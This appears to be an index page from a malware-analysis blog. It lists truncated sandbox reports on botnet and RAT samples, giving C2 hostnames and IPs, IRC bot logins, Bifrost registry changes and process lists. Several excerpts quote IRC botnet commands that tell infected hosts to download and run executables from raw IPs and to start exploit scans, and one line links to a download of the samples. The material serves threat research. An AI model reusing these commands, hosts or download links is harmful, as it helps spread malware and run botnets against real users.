Author: Pig

DNS Lookup Host Name IP Address testusa.helohmar.com 76.73.36.42 api.ipinfodb.com 67.212.74.82 www.craigslist.org 208.82.236.208 geo.craigslist.org 208.82.236.208 Download URLs http://67.212.74.82/v2/ip_query.php?key=4f7c7d0d524a3e9445217575619159f874a734aa16e97b87fc505f49de8e31a1&output=xml (api.ipinfodb.com) http://208.82.236.208/ (www.craigslist.org) http://208.82.236.208/ (www.craigslist.org) Outgoing connection to remote server: testusa.helohmar.com port 8800 Outgoing connection to remote server: testusa.helohmar.com port 8800 Outgoing connection to remote server: testusa.helohmar.com TCP port 8800 Outgoing connection to remote server: api.ipinfodb.com TCP portRead more...

Remote Host Port Number 217.70.188.30 5900 PASS Virus 92.243.28.194 5900 PASS Virus 95.142.168.229 5900 PASS Virus NICK VirUs-xlaixqgo USER VirUs “” “zbo” : 8Coded 8Ahmed.Ramzey@Hotmail.Com.. NICK VirUs-firqfllm USER VirUs “” “zux” : NICK VirUs-nqcgfvif USER VirUs “” “pcm” : NICK VirUs-whzmmafw USER VirUs “” “kga” : NICK VirUs-rffujwic USER VirUs “” “xvi” : NICK VirUs-ubjkqifuRead more...

mydrivers.babypin.net ip: 109.196.130.50 mydrivers.babypin.net ip: 109.196.130.66 mydrivers.babypin.net ip: 98.126.214.82 Remote Host Port Number 112.78.112.208 80 218.85.133.201 80 98.126.214.82 6682 PASS laorosr USER SP2-364 * 0 :COMPUTERNAME MODE [N00_USA_XP_6656961] @ -ix MODE #dpi -ix Master86 changes topic to ‘.asc -S|.http http://208.53.183.181/icsy.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_allRead more...

DNS Lookup Host Name IP Address 0 127.0.0.1 www.52fa.net www.52fa.net 204.188.243.34 UDP Connections Remote IP Address: 127.0.0.1 Port: 1033 Send Datagram: 2 packet(s) of size 1 Recv Datagram: 2 packet(s) of size 1 Download URLs http://204.188.243.34/wm1/count.asp?mac=00:0C:F1:85:8C:74&ver=1&os=nothing (www.52fa.net) Outgoing connection to remote server: www.52fa.net TCP port 80 Registry Changes by all processes Create or Open ChangesRead more...

Capability to manipulate a user list control in instant messenger (IM) programs such as AOL, Yahoo! Messenger, Skype. An affected user’s contact list could be used by an IM worm in order to replicate over the IM network. 210.170.62.115:2345 pass xxx Nick: NEW-[AUT|00|P|85861] Username: XP-1777 Server Pass: xxx Joined Channel: #!gf! with Password test ChannelRead more...

april2.botsgod.info ip: 92.243.28.194 april2.botsgod.info ip: 95.142.168.229 april2.botsgod.info ip: 217.70.188.30 Remote Host Port Number 217.70.188.30 4949 92.243.28.194 4949 95.142.168.229 4949 NICK {NOVY}[USA][XP-SP2]043406 USER VirUs “” “lol” :0320 NICK [USA][XP-SP2]073489 USER VirUs “” “lol” :7113 USER VirUs “” “lol” :4947 NICK [USA][XP-SP2]725879 USER VirUs “” “lol” :8170 NICK [USA][XP-SP2]710812 USER VirUs “” “lol” :0319 NICK [USA][XP-SP2]250195 USERRead more...

Everything is in the title u can download them here: http://1edeb898.uberpicz.com

DNS Lookup Host Name IP Address medogrgr.no-ip.biz 188.49.5.146 Outgoing connection to remote server: medogrgr.no-ip.biz TCP port 81 Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{9D71D88C-C598-4935-C5D1-43AA4DB90836} “stubpath” = [REG_EXPAND_SZ, value: C:WINDOWSBifrostserver.exe s] HKEY_LOCAL_MACHINESOFTWAREBifrost “nck” = [REG_BINARY, size: 16 bytes] HKEY_CURRENT_USERSoftwareBifrost “klg” = [REG_BINARY, size: 1 bytes] Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftAdvanced INF Setup “AdvpackLogFile” HKEY_LOCAL_MACHINESYSTEMControlSet001ControlTerminalRead more...

still USA hosting involved in Botnet hosting Remote Host Port Number 208.53.183.219 80 208.53.183.73 80 208.53.183.92 80 98.126.44.98 8100 PASS laorosr ircd here MODE #! -ix MODE #Ma -ix USER SP2-650 * 0 :COMPUTERNAME MODE [N00_USA_XP_9718720] @ -ix MODE #dpi -ix Joins channel: :#! #! :.asc​-S|.http​ http://​208.53.1​83.217/u​se13.exe​|.asc ex​p_all 30​ 5 0 -a-​r -e|.as​c exp_al​l 30Read more...

Processes CreatedPId Process Name Image Name 0x378 cc.exe C:WINDOWScc.exe Threads CreatedPId Process Name TId Start Start Mem Win32 Start Win32 Start Mem 0x2ac lsass.exe 0x298 0x7c810856 MEM_IMAGE 0x77e76bf0 MEM_IMAGE 0x348 svchost.exe 0xf8 0x7c810856 MEM_IMAGE 0x7c910760 MEM_IMAGE 0x378 cc.exe 0x374 0x7c810867 MEM_IMAGE 0x4973f0 MEM_IMAGE 0x3f4 svchost.exe 0x67c 0x7c810856 MEM_IMAGE 0x77e76bf0 MEM_IMAGE DNS QueriesDNS Query Text bss-crypt.no-ip.infoRead more...